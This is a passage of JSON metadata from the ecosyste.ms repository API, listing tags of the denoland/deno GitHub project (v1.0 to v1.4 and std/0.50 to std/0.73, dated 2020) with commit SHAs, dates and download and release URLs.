epos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ec